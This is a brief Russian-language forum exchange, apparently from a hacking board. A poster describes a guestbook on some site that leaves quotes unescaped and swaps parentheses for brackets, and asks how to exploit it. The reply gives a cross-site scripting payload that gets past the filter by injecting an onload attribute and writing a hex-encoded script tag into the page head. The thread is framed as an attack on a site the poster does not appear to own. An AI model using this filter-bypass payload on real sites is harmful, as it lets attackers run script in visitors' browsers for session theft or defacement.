есть сайт, немного покопавшить вижу, в гостевой книге проходят символы(не экранизируются) PHP: " но перед ставится PHP: "\" /PHP] т.е с БД не поиграть. есть возможность отправить ссылку [PHP]http://3333.ru/" onclick="alert(); но скобки PHP: () заменяются PHP: [] и выходит PHP: http://3333.ru/" onclick="alert[]; вот что можно тут придумать интересного?
http://3333.ru/" onload="javascript:document.head.outerHTML=\"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\"" a=" Как я понял, значение подставляется в параметр? Если более ничего не фильтруется то можно к примеру так.
